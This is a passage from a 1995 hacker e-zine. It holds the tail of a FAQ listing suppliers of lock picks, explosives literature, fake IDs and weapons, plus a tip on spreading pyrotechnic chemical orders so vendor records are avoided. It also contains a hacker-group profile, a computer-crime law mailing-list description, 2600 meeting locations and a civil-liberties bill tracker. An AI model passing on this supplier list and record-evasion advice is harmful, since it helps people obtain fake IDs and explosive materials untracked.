wrenches and a broken key extractor. Pouch. Deluxe ($54.60): 16 pix, wrenches, extractor. Pocket size leather case. Superior ($79.80): 32 pix, wrenches,extractor. Hand finished leather case. ----------------------------------------------------------------- ---- Explosives and other underground stuff Loompanics is one of the major distributers of material relating to the underground including explosives. You can get the catalogue by mailing: Loompanics Unlim P.O. Box 1197 Port Townsend, Wash 98368 ----------------------------------------------------------------- ---- Fake IDs, Technical Manuals on almost anything (from CyberSorceror) NIC/LAW ENFORCEMENT SUPPLY 500 Flournoy Lucas Road/Building #3 Post Office Box 5950 Shreveport, LA 71135-5950 Phone: (318) 688-1365 FAX: (318) 688-1367 NIC offers ids of ALL types just about, as well as how-to manuals on EVERYTHING, posters, lock stuff, electronic sureillance stuff. ----------------------------------------------------------------- ---- Weapons, explosives, survival gear. (from CyberSorceror) Phoenix Systems, INC. P.O. Box 3339 Evergreen, CO 80439 (303) 277-0305 Phoenix offers explosives, grenade launchers, incendiaries, tear gas grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000 volts, ballistic knives and maces(battering), armored personnel carriers, saps/batons, booby traps, envelope clearing chemicals .. turns envelopes transparent until it dries and leaves no marks (used by postal service and FBI), survival stuff, radiation pills, gasoline stabilizers for long term storage, emergency supplies, etc, more how-to books on more illegal stuff than you'd ever have time to read. ----------------------------------------------------------------- ---- Chemicals and lab equipment!! Only requires SIGNATURE for proof of age! (from Neurophyre) Hagenow Laboratories, Inc. 1302 Washington St. Manitowoc, WI 54220 Send a crisp $1 bill and a request for a catalog. Tip: Don't order all your pyro stuff from here. They DO keep records. Be safe. ================================================================= ==== Appendix E. PGP keys Belisarius: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.2 mQCNAi1FJ1MAAAEEALPDEIrmzPazAbkJ2daYnh8fy172tMmHuMPHIMaXdHWLFGjz +XI8fJR950EGbrMKIIqsb+Xt3qhE+aQLdyggxjUuye+jTHi+JJdNg8VsULW7FvFk YmFrObd35gQqzu9hFbUZNFxUJaRiEcViNA8bCcjQD5Fn0x/8trRiuxrAgLolAAUR tApCZWxpc2FyaXVz =RxKB -----END PGP PUBLIC KEY BLOCK----- Neurophyre: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3 mQCrAiw8FYMAAAEE8MHUh1VdCTeNLRr9xfzivxVODmY4Xv1VOzFmA0sCH4tB6aRA /4+R+nzkW2ZB8N8tOa0tk+S3f20lIoWWPk0M56OaNreT0LLbM9KdOHXE5XDO/mtu mKdy98eK3fDzXp+vVyK/mo8rhIR4uLcfA1JIuvbBdLa1d/Xq7PEKvayqYXpwvxO6 gLiy72ZWI616ijPttv2QYxSqu7rNSVzEwQy1AAUTtB9Zb3VyIGZsYXYtb3Itcml0 ZSwge05ldXJvcGhpcmV9 =FXdY -----END PGP PUBLIC KEY BLOCK----- ================================================================= ==== ***************************************************************** **** ************************ END OF THE HACK-FAQ! *********************** ***************************************************************** **** ***** Therefore, determine the enemy's plans and you will know ****** ***** which strategy will be successful and which will not. ****** ***** -- Sun Tzu, The Art of War ****** ***************************************************************** **** ***************************************************************** **** * * * * * * * * * * * * * * * * * * * * -= H A C K E R S =- Issue #3, File #3 of 9 The Pursuit of Knowledge Notes on The Guild by Route 9/11/95 You may have been hearing much clamor about the Guild as of late. Maybe you haven't. It depends what circles you hang out in. This article is here to tell you who we are and dispell any myths that may be floating around. [OverView] Just what is the Guild? The Guild is a group of individuals that are, quite simply, dedicated to the pursuit of knowledge. I started the group (see AKA's, below) as a pet project with a friend of mine (Nihil). Actually, I started the group as a response to several offers to join other existing groups. I felt uneasy about most of them, and decided to go out on my own, and do things the way *I* wanted, the first time. The result is the Guild. At the time of this writing there are 10 members in the group. We have had a few members step down, and one who actually just disappeared. We have even had one person declare a vendetta against me and the Guild for his denial of acceptance. [Members] Some of us are very vocal and 'high profile'. Some of us are not. Some of us are constant alt.2600 denizens. Some of us do not wish to wade through such a high traffic group, and prefer others. Some of us only get online to check email. Some of us are industry professionals, some of us are students. Some are both. We are of all different backgrounds, talents and interests. The diversity is the beauty of it all. If we all came from the same walks of life, did the same things, and liked the same things, we'd be pretty useless as a group (we'd also be pretty boring). The fact that we are so diverse and the fact that we *can* organize under a common goal is saying something right there. To become a Guild member, all one has to do is fill out the application you will find at my ftpsite (see URL's below). It is then voted on by all the current members (Founding members get two votes). We are rather discriminating, and turn down many people. We do not wish to get too large, and we do not wish to induct just anyone. It's hard to put a qualifier on just what we are looking for in members. It's partly what hard facts we see on the app, and partly gut feeling. If you are serious, feel free to fill one out, we are always glad to see new applications. [Axoims] The creeds we gather under are the following, in order: 1) The pursuit of knowledge The active and absolute pursuit of gainful and enlightening information. 2) The right to privacy The right to be left alone, the right to actively pursue this privacy through encryption, obscurity, or whatever means necessary. 3) The right of individualism The right to stand out in a crowd and show that you are different, and proud of it. Also, the right to stand on your own, take responsibility for yourself, and not drop a dime on your friends and peers, should a three-letter agency press you. 4) The destruction of ignorance The dissemination, through discretion, of the acquired knowledge. The correcting of obvious wrongs of others, and the ability to concede that you were wrong after evidential proof of falsehood is provided. 5) The support of fellow members The supporting, through whatever means necessary, of fellow members of the Guild. [Goals and Views] What are ends to which we gather under? It was my original goal to get a bunch of people with similar interests together and exchnage thoughts and ideas. That was my original intent. It has grown beyond that. These past few months have changed my orginal vision into something much grander. Being in the Guild means something. It is being able rely on a group of adroit people to help you out of a situation; whether it be a bit of code you can't quite seem to get to compile, or an a pesky usenet denizen who won't leave you alone. Being in the Guild is knowing you have some friends out there in cyberspace. Friends you can count on. That's what it comes down to. One of my personal opinions is one of Freedom of Information. Information, in it's raw and pure form, wants to be free. I am completely hypocritical, however. I also beleive in the right to privacy. How do I justify one to the other? It's my belief that information *does* want to be free. It tries it's hardest to be widely recognizable and distributable. It doesn't hide. If you have information you want kept secret, it's *your* responsibility to make *sure* it *becomes* secret, and *stays* secret. If there is information I really want private *I* make sure it stays private. I am charged with it's secrecy. If it was discovered by a hacker, or by some other means, it's *my* fault for not clipping it's wings well enough...so to speak...Cryptogrpahy is the great enemy of Freedom of Information. It does a damn good job of keeping it secure (if implemented correctly). So, to sum it up, I am a firm advocate of both the Right to Privacy, and the Freedom of Information. It all depends on what the content is, and how much you want it secured (how well you can crush it's natural desire to be free). [What we AREN'T] In lieu of recent events, some people may have been confused as to what we are and what we aren't. You should have a pretty decent idea of what we are. Here's a couple things we AREN'T: An information-leeching orginization that is only here to gather up 'good stuff' that we couldn't get individually. Into carding, phreaking, or warez. Translated: we aren't into getting arrested. Advocates of mailbombing, usenet spamming, mass mailing-list subscriptions, etc. Personally, I find certian denial of service attacks rather interesting. I keep my interests confined to my own networks and computers, however. If I crash my own computers, it's my business. If I crash someone else's that's fucked up. We don't do that. It's childish and inconsisderate, to say the least. [The Infinity Concept] The Infinity Concept is our electronic zine. We try to publish it seasonally...We try that is....It is the personification of creeds 1 and 4. It is our way of widely disseminating information and aquired knowledge. Our next issue should be out by mid-October. It can be found at any of our URL's... [AKA's] This roster is current as of 9/4/95 Name AKA Address Joined ----------------------------------------------------------------- ---- Route (Infinity) daemon9@netcom.com Founding Nihil (Scribe) nihil@nwlink.com Founding Carbonboy (Scott Walters) carbon@inforamp.net May 1995 Squidge (Timothy R. Matthews) T.R.Matthews@bradford.ac.uk June 1995 Mythrandir(Jeff Thompson) jwthomp@uiuc.edu June 1995 deliryum (Deliryum) deliryum@cdc.net July 1995 Alhambra (Jeremy Rauch) alhambra@jhu.edu July 1995 MrZippy (Robert Fries) rpfries@interaccess.com July 1995 Cheshire (Justin Larue) cheshire@nether.net Aug 1995 [URL's] url ftp://ftp.netcom.com/pub/da/daemon9/"__the Guild__" url http://homepage.interaccess.com/~rpfries * * * * * * * * * * * * * * * * * * * * -= H A C K E R S =- Issue #3, File #4 of 9 _ _____ _____ | | /\ / ____| / ____| | | / \ | | | | | | / /\ \ | | | | | |____ / ____ \ | |____ | |____ |______| /_/ \_\ \_____| \_____| Legal Aspects of Computer Crime "echo subscribe lacc|mail lacc-request@suburbia.net" REASONS FOR INCEPTION --------------------- The growing infusion of computers and computing devices into society created a legislative and common law vacuum in the 1980's. State prosecutors attempted to apply traditional property protection and deception laws to new technological crimes. By and large they were successful in this endeavor. There were however a very few but well publicized failed cases against computer "hackers" (most notable R vs Gold - UK House of Lords). In an atmosphere of increased government reliance on computer databases and public fear and hostility towards computerization of the workplace, the world's legislatures rushed to criminalize certain types of computer use. Instead of expanding the scope of existing legislation to more fully encompass the use of computers by criminals, changing phrases such as "utter or write" to "utter, write or transmit" (the former being the prosecutions undoing in the well publicized Gold case) as had been done with the computerization of copyright law, an entirely new class of criminal conduct was was introduced. The computer had been seen not just as another tool that criminals might use in committing a crime but something altogether foreign and removed from the rest of society and established Law. The result was a series of nievely drafted, overly broad and under-defined statutes which criminalized nearly all aspects of computer use under certain conditions. In the the 1990's a fundamental and evolving shift in computer usage has started to occur. At work it is rare now to see a white collar worker not in the possession of a computer. At home over one third of households have computer systems. The computer is no longer the "altogether foreign and removed from the rest of society" device it once was. It has come out of the domain technical specialist and into the main stream. Even our notoriously slow moving legal profession is adopting it as an essential tool. But there is another change. A qualitative one important to our discussion. When you connect hundreds of thousands of computers and thus the people that use them together you find something remarkable occurs. An event that you could never have predicted by merely summing the discrete components involved. A unique virtual society forms. Despite being designed with computer networking in mind computer crime legislation copes very poorly with non homogeneous authorization. Societies are based around a common knowledge of history, beliefs, and current events. Each member of a society can be pinpointed as belonging to the society in question by the ideas, beliefs and knowledge they hold in common with its other members. Any new member to a society learns this knowledge only because it is passed onto them; directly by other members or indirectly via its media, works of literature or observation. Successful large scale computer networks like the Internet form for one reason and one reason only; information sharing. When a critical mass of diversity, interests, user population and information exchange is reached, a situation develops that mirrors in all important aspects a vibrant and evolving society. Members of these computer network societies have nearly equal ability to convey their thoughts to other members and do so in a timely manner without unwanted distortion. This is a remarkably democratic process compared to the very real self censorship and top heavy direction that is so manifest in traditional broadcast and publishing industries. But unlike the physical societies that have here-to been the norm, the electronic network society is not isolationist. It continues to draw from, mesh and feed its beliefs into the traditional societies it was populated out of. This coupling process between computer networks and traditional societies is expected to continue - at least for English speaking countries, until a stage is reached were it is difficult to find any boundary between the two. The majority of citizens will then fall most completely under the gamut of the appalling drafted computer crimes legislation many times every day of their lives. In the vast majority of legislation directed to address computer crime everything which can be performed on a computer unless "authorized" is defined as illegal. Granted an individual can authorize themselves to do anything they wish with their own computer, but in a networked topology a typical computer user may use or otherwise interact with hundreds or even thousands of other peoples computers in any given day. In Law it has previously been the case that which was not expressly forbidden was permitted. Currently the digital equivalent of moving a chair is illegal and carries with it in most countries a 5 to 10 year prison term. It is a sad reflection on the legislature of the day that the computer medium was criminalized rather than the intent or damage to to the victem. It is unlikely that law reform will occur until current political concern over computer networks such as the Internet is moderated. If anything the push so far from political drafters has being to once again introduce brand new medium criminalizing legislation rather than revitalizing the existing codes. This unfortunate "labeled arrow" approach will continue as long as there exists an ill informed and technologically ignorant legislature that finds itself pliant to the whims of sensationalist media and honed to their dubious targets. So ill defined and over broad are the terms used in computer crime legislation that in most western countries pressing a button on a silicon wrist watch without permission can be construed as "insertion of data into a computer without authority" an offence which carries 10 years penalty in some countries. It is however within the above unfortunate lack of appropriate legislation, precedents and judicial guidance that judiciary, practitioners, prosecutors, law enforcement personnel and drafters of future codes have to struggle to find resolution. This list has been created in an attempt to mitigate the lack of tangible resources people involved with computer crime have at their disposeal. It is hoped that by bringing together knowledgeable legal professionals together with para-legal personnel and informed lay persons that information and resources relevant to the difficult task of analyzing, presenting in court or otherwise dealing with computer crime law and computer crimes may be shared and intelligent discussion stimulated. nb. this list it is also an appropriate forum to discuss computerized legal, law enforcement and criminology databases, such as Netmap, Watson, PROMIS, Lexis, APAIS, CRIM-L, et cetera. GUIDELINES ---------- In order to keep the semantic content high on this list, please consult the following before posting: DO POST DON'T POST ------- ---------- Un/reported decisions. Personal insults. Commentaries on cases. Signatures >4 lines. Reviews on relevant books. Quoted replies with more than 30% Relevant journal articles. quoted from the original. Information about proposed legislation. Short questions, or questions which Full text of CC legislation. otherwise do not convey useful Judicially defined terms. information in their own right. Articles on new arrests or Gossip about the moderator. cases. Articles about computer (in)security, Detailed questions. they should be sent to: Intelligent commentary. "best-of-security@suburbia.net" Personal experiences with computer "breaking into a computer is the same crime. as...." Very well thought out analogies. Petitions (if you think they are Relevant transcripts. exceptionally relevant, send them to Defence or prosecution strategy. the moderator, who may post them). Relevant papers, thesis. Chain letters. Conference announcements and details. Advertising material. Locations of legal resources. Ethical considerations that are only Computer forensics information. "opinion". Trial/court dates, verdicts etc. Content free news reports or Reviews of legal software. articles. Pointers to any of the above. Abusive, antagonistic or otherwise, Cross post relevant information from non information rich or constructive other lists or news groups. phrases. Relevant affidavits, court documents. Quotes from Dan Quayle. SUBSCRIBING ----------- Send mail to: lacc-request@suburbia.net with the body of: subscribe lacc UNSUBSCRIBING ------------- Send mail to: lacc-request@suburbia.net with the body of: unsubscribe lacc POSTING ------- To send a message to the list, address it to: lacc@suburbia.net REPLYING -------- If you are replying to a message already on the LACC list using your mail programs reply facility you will almost certainly have to change the reply address to lacc@suburbia.net. This is because the LACC mailing list program is configured to have return replies sent no "nobody" in order to avoid receiving the replies of "vacation" programs which automatically send email saying "I've gone to the moon for two weeks to hunt rare bits". -- +----------------------------------+----------------------------- ------------+ | Julian Assange | "if you think the United States has | | | has stood still, who built the largest | | proff@suburbia.net | shopping centre in the world?" - Nixon | +----------------------------------+----------------------------- ------------+ * * * * * * * * * * * * * * * * * * * * -= H A C K E R S =- Issue #3, File#5 of 9 2600 MEETINGS North America Ann Arbor, MI Galleria on Souh University Austin Northcross Mall, across the skating rink from the food court, next to Pipe World. Baltimore Baltimore Inner Harbor, Harborplace Food Court, Second Floor, across from the Newscenter, Payphone: (410) 547-9361. Baton Rouge, LA In The LSU Union Building, between the Tiger Pause and Swensen's Ice Cream, next to the payphone. Payphone numbers:(504) 387-9520 9520, 9538, 9618, 9722, 9733, 9735. Bloomington, MN Mall of America, north side food court, across from Burger King and the bank of payphones that don't take incoming calls. Boise, ID Student Union building at Boise State University near payphones. Payphone number:(208) 342-9432, 9559, 9700, 9798 Boston, MA Prudential Center Plaza, Terrace Food Court, Payphones:(617) 236- 6582, 6583, 6584, 6585. Chicago, IL 3rd Coast Cafe, 1260 North Dearborn. Cincinnati Kenwood Town Center, food court. 3 Clearwater, FL Clearwater Mall, near the food court. Payphones:(813) 796-9706, 9707, 9708, 9813. Cleveland CoventryAraica in Cleveland Heights Dallas Mama's Pizza, northeast corner of Campbell Rd. and Preston Rd. in North Dallas, first floor of the two story strip section. 7pm. Payphone:(214) 931-3850. Danbury, CT Danbury Fair Mall, off Exit 4 of I-84, in food court. Payphones: (203) 748-9995 Hazelton, PA Lural Mall in the new section by phones. Payphones:(717) 454-9236, 9246,9365. 4 Houston Galleria Mall, 2nd story overlooking the skating rink. Kansas City Foor Court at the Oak Park Mall in Overland Park, Kansas. Los Angeles Union Station, corner of Macy & Alameda. Inside main entrance by bank of phones. Payphones:(213) 972-9358,9388, 9506, 9519, 9520, 625-9923, 9924; 614-9849, 9872, 9918, 9926. Louisville, KY The Mall, St. Matthew's food court. Madison, WI Union South (227 S. Randall St.) on the main level by the payphones Payphones: (608) 251-9746, 9914, 9916, 9923. Nashville Bellevue Mall in Bellevue, in the food court. New York City Citicorp Center, in the loby, near the payphones, 153 E 53rd St., between Lexington & 3rd. Payphones: (212) 223-9011, 8927; 308- 8044, 8162 Ottawa, ONT (Canada) Cafe Wim on Sussex, a block down from Rideau Street. 7pm. Philadephia 30th Streek Amtrak Station at 30th & Market, under the "Stairwell 7" sign. Payphones (215) 222-9880, 9681, 9779, 9799, 9632; 387-9751. Pittsburgh Parkway Center Mall, south of downtown, on Route 279. In the food courth. Payphone: (412)928-9926, 9927, 9934. Portland, OR Lloyd Center Mall, second leavel at the food court. 6 Poughkeepsie, NY South Hills Mall, off Route 9. By the payphones in front of Radio Shack, next to the food court. Raleigh, NC Crabtree Valley Mall, food court. Rochester, NY Marketplace Mall food court. St. Louis Galleria, Highway 40 and Brentwood, lower level, food court area, by the theatres. Sacramento Downtown Plaza food court, upstairs by the theatre. Payphones: (916) 442-9543, 9644. San Fransico 4 Embarcadero Plaza(inside). Payphones: (415) 398-9803, 9804, 9805, 9806. Seattle Washinton State Covention Center, first floor. Payphones: (206) 220-9774, 9775, 9776, 9777. Washington DC Pentagon City Mall in the food court. Europe & South America Buenos Aires, Argetina In the bar at San Jose 05. London, England Trocadero Shopping Center (near Picadilly Circus)next to VR machines. 7pm to 8pm. Munich, Germany Hauptbahnhof (Central Station), first floor, by Burger King and the payhpones.(one stop on the S-Bahn from Hackerbruecke - Hackerbridge!) Birthplace of Hacker-Pschorr beer. Payphones: +49- 89-591-835. +49-89-558-541, 542, 543, 544, 545. Granada, Spain At Kiwi Pub in Pedro Antonio de Alarcore Street. Halmstad, Sweden At the end of the town square(Stora Torget), to the right of the bakery (Tre Hjartan). At the payphones. All meetings take place on the first Friday of the month from approximately 5pm to 8pm local time unless otherwise noted. To start a meeting in your city, leave a message and phone number at (516)751-2600, or send email to: meetings@2600.com This PHiLe courtesy of the 2600 Web Site FuSIoN ----------------------------------------------------------------- ------------- T H E C R i M E S Y N D i C A T E NPi/TcS/SUi fu-sion \'fyu-zhen\ n, the union of atomic nuclei resulting in the release of enormous quantities of energy when certain light elements unite. ----------------------------------------------------------------- ------------- * * * * * * * * * * * * * * * * * * * * -= H A C K E R S =- Issue #3, File #6 of 9 ================================================================= ========== BillWatch 18 VTW BillWatch: A weekly newsletter tracking US Federal legislation affecting civil liberties. BillWatch is published every Friday evening as long as Congress is in session. Congress is: in session Issue #18, Date: Sun Sep 17 16:36:37 EDT 1995 Please widely redistribute this document with this banner intact Redistribute no more than two weeks after above date Reproduce this alert only in relevant forums Distributed by the Voters Telecommunications Watch (vtw@vtw.org) _________________________________________________________________ __________ TABLE OF CONTENTS '-' denotes quiet issue (no movement this week) '+' denotes movement this week on an issue '++' denotes movement this week with an action for YOU to do + Summary of Internet Censorship legislation + Changes in US policy on cryptography Review of workshop at NIST Sep 15th Text of ACLU position on encryption Status: "Clipper II" ramrodding is progressing - HR1978, S n.a. (Internet Freedom and Family Empowerment Act) Status: In conference - HR1004, S314 (1995 Communications Decency Act) Status: In conference - HR n.a., S714 (Child Protection, User Empowerment, and Free Expression in Interactive Media Study Act) Status: In conference - Last-minute provisions of the Manager's Mark amendment to HR1555 Status: In conference - HR n.a., S892 (Protection of Children from Computer Pornography Act) Status: In committee - HR n.a., S974 (Anti-Electronic Racketeering Act) Status: In committee + HR n.a., S1237 (Child Pornography Prevention Act Text of S1237 Statement of introduction of S1237 (Hatch) Status: In committee (Judiciary) - Subscription Information _________________________________________________________________ __________ SUMMARY OF INTERNET CENSORSHIP LEGISLATION The four different pieces of legislation that address Internet regulation are still waiting for conference committee consideration. With the budget as the current Congressional priority, it isn't likely the fate of the Internet will be considered for several weeks. VTW is still collecting the signatures of businesses and bulletin boards that wish to participate in the joint letter to be sent to Congress urging parental control (instead of censorship) as a means of approaching the Internet. VTW urges you to contact your Internet service provider along with any business that use the Internet to signon to this letter. Details can be found at the http://www.vtw.org/cdaletter/ or by sending mail to vtw@vtw.org with "send cdaletter" in the subject line. _________________________________________________________________ __________ CHANGES IN US CRYPTOGRAPHY POLICY VTW has been chronicaling the government's attempts at forcing Clipper II onto the public and industry. Of course, it is still extremely unpopular. At the Sep. 6th and 7th NIST workshop, industry and public interest groups panned the plan and small working groups setup by NIST to evaluate the criteria unhappily participated, even openly revolting in some instances. On Sep 15th, NIST held another workshop to discuss the FIPS (Federal Information Processing Standard) that would embody Clipper II (also know as Commercial Key Escrow). Believe it or not, this meeting was not a repeat of the Sep 6th/7th meeting. Several attendees noticed significant differences: HEIGHTENED GOVERNMENT PRESENCE At the Sep 6th/7th workshop, dissent among industry and public representatives interfered with NIST's attempts at having a discussion about the specifics of Clipper II. Simply put, industry and the public advocates didn't like the plan. Therefore discussions of the details were fruitless. One smaller working group simply refused to work on the details and issued a statement condemning the whole Clipper II plan. The government upped the number of Federal participants at the Sep. 15th meeting in order to prevent the repeat of such an event. Several public advocates noticed a high percentage of government-provided participants in the working groups. One civil liberties advocate noted that he had never seen so many NSA individuals identifying themselves in public before. Needless to say the tactic worked. Little in the way of opposition to the plan was voiced. BURNOUT AMONG INDUSTRY AND PUBLIC REPRESENTATIVES Having been through this Kafka-esque exercise a mere two years ago with the original Clipper plan, industry and public advocates are showing signs of burnout. It's fairly clear that their concerns are not being listened to. Both the public and the industry clearly sent a message to the Clinton Administration when the original Clipper was proposed. Said F. Lynn McNulty of NIST in the New York Times Magazine (6/12/94), "We received 320 comments, only 2 of which were supportive." NIST made the Clipper Chip a government standard anyway, and it flopped in the marketplace. How many of those Clipper-phones do you see running around? The government's so-called "stupid criminals" are just falling over themselves to buy them, aren't they? NIST has stated that it has already been decided to make Clipper II a standard, before receiving any public input. Is this how democracy is supposed to work? COMMERCIAL CHEERLEADING FROM SELECT INDUSTRY INDIVIDUALS If you're wondering how the Clinton administration can get away with pushing such a disastrous proposal again, look no further than select members of the hardware and software industry. Several companies that make both security software, hardware devices and several key escrow companies are pushing Clipper II because they incorrectly believe that the government will not make it mandatory, and because they believe the industry wants key escrow. VTW believes they have it half-right: industry wants key escrow, though not on the Clinton Administration's terms. It is clear, however, that the Administration will not allow key-escrow to be a voluntary program. The EPIC (Electronic Privacy Information Center) has proved that the government has enough common sense to know that key escrow is going to be unpopular and will have to be forced on the marketplace. (See FOIA'd documents at URL:http://www.epic.org/crypto/). Never the less, several companies who want to produce hardware key escrowed devices, key escrowed software, and become escrow holders have become the champions of the Clipper II (Commercial Key Escrow) program. With their support, VTW predicts that the Clinton Administration will ratify Clipper II as a FIPS standard over the objections of industry and public. Stay tuned to BillWatch for progress on Clipper II. _________________________________________________________________ __________ Internet Freedom and Family Empowerment Act (HR 1978, S n.a.) *** THIS BILL IS IN CONFERENCE COMMITTEE *** Description: HR 1978 is an attempt to recognize the unique medium that is online systems and avoid legislating censorship. It would: -prohibit the FCC from regulating constitutionally-protected online speech -absolve sysops and services from liability if they take good faith measures to screen their content or provide parental-screening software See directions below for obtaining analyses from various organizations. House sponsors and cosponsors: Cox (R-CA), Wyden (D-OR), Matsui (D-CA), White (R-WA), Stupak (D-MI), Rohrabacher (R-CA) House status: HR 1978 was passed 8/4/95 by the House in a vote (421-4). Where to get more info: Email: vtw@vtw.org (with "send hr1978" in the subject line) Gopher: gopher -p 1/vtw/exon gopher.panix.com WWW: http://www.panix.com/vtw/exon _________________________________________________________________ __________ 1995 COMMUNICATIONS DECENCY ACT (CDA) (Passed Senate, HR 1004) *** THIS BILL IS IN CONFERENCE COMMITTEE *** Description: The CDA would criminalize electronic speech currently protected in print by the First Amendment. House CDA sponsors: Johnson (D-SD) House status: HR1004 will probably never leave committee. Senate status: The Senate affirmed the Communications Decency Act (84-16) as amended to the Telecommunications Reform bill (S 652). Where to get more info: WWW: http://www.panix.com/vtw/exon http://www.eff.org/ http://www.cdt.org/ http://epic.org/free_speech Gopher: gopher -p 1/vtw/exon gopher.panix.com gopher gopher.eff.org Email: vtw@vtw.org (with "send cdafaq" in the subject line) cda-status@cdt.org cda-info@cdt.org _________________________________________________________________ __________ Child Protection, User Empowerment, and Free Expression in Interactive Media Study Act (Amendment to HR1555 in the House, S 714) *** THIS BILL IS IN CONFERENCE COMMITTEE *** Description: Would direct the Department of Justice to study whether current law is sufficient to cover enforcement of existing obscenity laws on computers networks. Senate sponsors: Leahy (D-VT) Senate status: Currently unattached to any legislation; attempted attachment to S.652 but failed (6/14/95). House sponsors: Klink (D-PA) House status: Amended to HR 1555 in committee. _________________________________________________________________ __________ Last-minute provisions of the Manager's Mark amendment to HR1555 (added to HR1555 at the last minute) *** THIS BILL IS IN CONFERENCE COMMITTEE *** Description: Criminalizes many forms of constitutionally-protected speech when they are expressed online. House sponsors: Unknown House status: Amended to HR 1555 through the Manager's Mark on 8/4/95. _________________________________________________________________ __________ 1995 Protection of Children from Computer Pornography Act (S 892) Description: Would make Internet Service Providers liable for shielding people under 18 from all indecent content on the Internet. Senate sponsors: Dole (R-KS), Coats (R-IN), Grassley (R-IA), McConnell (R-KY), Shelby (R-AL), Nickles (R-OK), Hatch (R-UT) Senate status: A hearing was held Monday July 24th. No action on the bill has happened yet as a result of that hearing. _________________________________________________________________ __________ Anti-Electronic Racketeering Act of 1995 (HR n.a., S 974) Description: S 974 has many effects (not good) on law enforcement's use of intercepted communications. It would also make it unlawful for any person to publicly disseminate encoding or encrypting software including software *currently allowed* to be exported unless it contained a "universal decoding device". This more than likely means that Clipper-style key escrow systems could be disseminated, but not strong, private cryptography. Senate sponsors: Grassley (R-IA) Senate status: Currently not active and probably won't move before the August recess. Senate citizen action required: Request bill below and familiarize yourself with it. VTW is tracking this bill, and will alert you when there is movement. There is no Congressional action to take right now; as other bills (such as the Communications Decency Act) pose a greater, more immediate threat. House of Representatives status: No House version is currently enrolled. Where to get more info: Email: vtw@vtw.org (with "send s974" in the subject line) Gopher: URL:gopher://gopher.panix.com:70/11/vtw/ _________________________________________________________________ __________ Child Pornography Prevention Act of 1995 (HR n.a., S 1237) Description: S 1237 would criminalize material that depicts children engaging in sexually-explicit conduct whether or not the material was produced with children or entirely without computer. Senate sponsors: Hatch (R-UT), Abraham (R-MI), Grassley (R-IA), Thurmond (R-SC) Senate status: In the Judiciary committee, no hearing has been held yet Senate citizen action required: Read the bill below and familiarize yourself with it. VTW is tracking this bill, and will alert you when there is movement. House of Representatives status: No House version is currently enrolled. Where to get more info: Check URL:http://thomas.loc.gov and search for bill S1237. VTW will have a homepage on this bill soon. We've included both the text of the bill and Congressional debate on it below. To amend certain provisions of law relating to child pornography, and for other purposes. IN THE SENATE OF THE UNITED STATES September 13 (legislative day, September 5), 1995 Mr. Hatch (for himself, Mr. Abraham, Mr. Grassley, and Mr. Thurmond) introduced the following bill; which was read twice and referred to the Committee on the Judiciary A BILL To amend certain provisions of law relating to child pornography, and for other purposes. Be it enacted by the Senate and House of Representatives of the United States of America in Congress assembled, SECTION 1. SHORT TITLE. This Act may be cited as the `Child Pornography Prevention Act of 1995'. SEC. 2. FINDINGS. Congress finds that-- (1) the use of children in the production of sexually explicit material, including photographs, films, videos, computer images, and other visual depictions, is a form of sexual abuse which can result in physical or psychological harm, or both, to the children involved; (2) child pornography permanently records the victim's abuse, and its continued existence causes the child victims of sexual abuse continuing harm by haunting those children in future years; (3) child pornography is often used as part of a method of seducing other children into sexual activity; a child who is reluctant to engage in sexual activity with an adult, or to pose for sexually explicit photographs, can sometimes be convinced by viewing depictions of other children `having fun' participating in such activity; (4) prohibiting the possession and viewing of child pornography encourages the possessors of such material to destroy them, thereby helping to protect the victims of child pornography and to eliminate the market for the sexually exploitative use of children; and (5) the elimination of child pornography and the protection of children from sexual exploitation provide a compelling governmental interest for prohibiting the production, distribution, possession, or viewing of child pornography. SEC. 3. DEFINITIONS. Section 2256 of title 18, United States Code, is amended-- (1) in paragraph (2)(E), by inserting before the semicolon the following: `, or the buttocks of any minor, or the breast of any female minor'; (2) in paragraph (5), by inserting before the semicolon the following: `, and data stored on computer disk or by electronic means which is capable of conversion into a visual image'; (3) in paragraph (6), by striking `and'; (4) in paragraph (7), by striking the period and inserting `; and'; and (5) by adding at the end the following new paragraph: `(8) `child pornography' means any visual depiction, including any photograph, film, video, picture, drawing, or computer or computer-generated image or picture, whether made or produced by electronic, mechanical, or other means, of sexually explicit conduct, where-- `(A) the production of such visual depiction involves the use of a minor engaging in sexually explicit conduct; `(B) such visual depiction is, or appears to be, of a minor engaging in sexually explicit conduct; or `(C) such visual depiction is advertised, promoted, presented, described, or distributed in such a manner that conveys the impression that the material is or contains a visual depiction of a minor engaging in sexually explicit conduct.'. SEC. 4. PROHIBITED ACTIVITIES RELATING TO MATERIAL CONSTITUTING OR CONTAINING CHILD PORNOGRAPHY. (a) In General: Section 2252 of title 18, United States Code, is amended to read as follows: `Sec. 2252. Certain activities relating to material constituting or containing child pornography `(a) Any person who-- `(1) knowingly mails, transports, or ships in interstate or foreign commerce by any means, including by computer, any child pornography; `(2) knowingly receives or distributes-- `(A) any child pornography that has been mailed, shipped, or transported in interstate or foreign commerce by any means, including by computer; or `(B) any material that contains child pornography that has been mailed, shipped, or transported in interstate or foreign commerce by any means, including by computer; `(3) knowingly reproduces any child pornography for distribution through the mails, or in interstate or foreign commerce by any means, including by computer; `(4) either-- `(A) in the maritime and territorial jurisdiction of the United States, or on any land or building owned by, leased to, or otherwise used by or under the control of the United States Government, or in the Indian country (as defined in section 1151), knowingly sells or possesses with the intent to sell any child pornography; or `(B) knowingly sells or possesses with the intent to sell any child pornography that has been mailed, shipped, or transported in interstate or foreign commerce by any means, including by computer, or that was produced using materials that have been mailed, shipped, or transported in interstate or foreign commerce by any means, including by computer; or `(5) either-- `(A) in the maritime and territorial jurisdiction of the United States, or on any land or building owned by, leased to, or otherwise used by or under the control of the United States Government, or in the Indian country (as defined in section 1151), knowingly possesses 3 or more books, magazines, periodicals, films, videotapes, computer disks, or any other material that contains any child pornography; or `(B) knowingly possesses 3 or more books, magazines, periodicals, films, videotapes, computer disks, or any other material that contains any child pornography that has been mailed, shipped, or transported in interstate or foreign commerce by any means, including by computer, shall be punished as provided in subsection (b). `(b)(1) Whoever violates, or attempts or conspires to violate, paragraphs (1), (2), (3), or (4) of subsection (a) shall be fined under this title or imprisoned not more than 10 years, or both, but, if such person has a prior conviction under this chapter or chapter 109A, such person shall be fined under this title and imprisoned for not less than 5 years nor more than 15 years. `(2) Whoever violates paragraph (5) of subsection (a) shall be fined under this title or imprisoned for not more than 5 years, or both.'. 